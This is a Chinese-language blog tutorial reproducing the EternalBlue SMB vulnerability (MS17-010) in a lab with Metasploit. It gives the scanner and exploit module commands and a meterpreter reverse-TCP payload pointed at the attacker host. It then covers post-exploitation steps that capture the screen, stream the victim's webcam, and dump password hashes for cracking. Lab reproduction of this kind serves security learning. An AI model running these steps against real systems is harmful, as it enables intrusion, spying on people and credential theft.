首页 > 编程语言 >CVE-2017-0143(永恒之蓝)漏洞复现By metasploit

CVE-2017-0143(永恒之蓝)漏洞复现By metasploit

时间:2022-09-22 19:34:58浏览次数:58  
标签:metasploit set 192.168 010 漏洞 0143 模块 2017 smb

一、永恒之蓝介绍

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。其中漏洞编号为MS17-010,利用多个SMB远程代码执行漏洞,可在无交互的情况下获取系统最高权限,又为远程代码任意执行。

二、metasploit工具介绍

metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可
模块介绍:辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。

Nmap --script=vuln    默认nse插件
Nmap vulscan vulners 调用第三方库探针
加入拓展扫描模块
https://cnblogs.com/shwang/p/12623669.html

三、实验环境

攻击机kali :192.168.93.132
靶机 win7:192.168.93.133(win7 需要关闭防火墙以及未打永恒之蓝补丁)

四、漏洞利用

1.先对靶机进行端口扫描

 发现445端口开放,可能存在MS017-010漏洞

2.启动msfconsole,搜索search ms17-010

 3.利用模块

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010这个模块进行验证

> use auxiliary/scanner/smb/smb_ms17_010
>set rhost 192.168.93.133> set rport 445> show option
>exploit或者run

 

 发现永恒之蓝漏洞,开始调用漏洞利用模块按照以下参数来进行攻击

>use exploit/windows/smb/ms17_010_eternalblue
>set rhost 192.168.93.133 >set lhost 192.168.93.132 >set payload windows/x64/meterpreter/reverse_tcp > exploit

 反弹shell
>shell

>whoani

 1 .捕获桌面:

meterpreter screenshot

2 .监视器打开

meterpreter webcam_stream

kali会自动打开浏览器播放被攻击的电脑摄像头,被攻击的电脑摄像头也会变亮

3.获得用户密码
密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump

 4.sysinfo查看系统信息

 

 


标签:metasploit,set,192.168,010,漏洞,0143,模块,2017,smb
From: https://www.cnblogs.com/mu-yi2/p/16720615.html

相关文章

  • IDE//VS//VS2017,VS2019没有代码提示的问题解决
    IDE//VS//VS2017,VS2019没有代码提示的问题解决小小菜鸡于2022-07-2815:24:44发布235 收藏文章标签:idec++visualstudio版权开始菜单-->所有程序–>VisualStudi......
  • coco2017 Dataset EDA
    Github仓库:gy-7/coco_EDA(github.com)对coco数据集的分析,近期忙着写论文,空余时间很少能写博文了。EDA的代码放在结尾了,Github仓库里也有。仓库里还有其他的一些EDA分析,......
  • CVE-2017-12149 JBoss JMXInvokerServlet 反序列化漏洞
    一、漏洞概述     2017年8月30日,厂商Redhat发布了一个JBOSSAS5.x的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的ReadOnlyAccessFil......
  • [THUSCH2017] 大魔法师
    #include<bits/stdc++.h>usingnamespacestd;constintN=3e5+5,MOD=998244353;intn,m,opt,l,r,v;structMatrix{intn,m,h[2][5];inlinevoidprint(){......
  • pycharm2017安装pygal
    1.pycharm2017安装pygal库   2.在Terminal对话框输入 python-mpipinstallpygal点击Enter即可自动安装。    ......
  • 树的难题 BJOI2017 点分治 单调队列
    P3714[BJOI2017]树的难题没时间码先口胡。明显有一个n^2的暴力。可以拿到20分。链的情况也非常容易一个简单的单调队列就可以解决当然可以暴力的采用线段树。这样......
  • 用metasploit映射公网远程控制舍友电脑
    用metasploit映射公网远程控制舍友电脑Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评......
  • P3955 [NOIP2017 普及组] 图书管理员
    P3955[NOIP2017普及组]图书管理员-洛谷|计算机科学教育新生态(luogu.com.cn)  #include<iostream>#include<cstdio>#include<cstring>#include<algorithm......
  • CVE-2017-7921 海康威视(Hikvision)摄像头漏洞复现
    今天看到了海康威视又出了新漏洞——CVE-2021-36260,突然心血来潮想要复现一下,结果搜到了一个旧的漏洞——CVE-2017-7921,而且发现仍然有不少海康威视摄像头后台没有修补这个......
  • Visual studio 2017 + EF6 + Oracle 更新模型向导闪退解决办法
    问题:从数据库更新模型,点下一步闪退,如图。问题原因:ODACforVisualStudio2017与Oracle.ManagedDataAccess、Oracle.ManagedDataAccess.EntityFramework版本不一致。......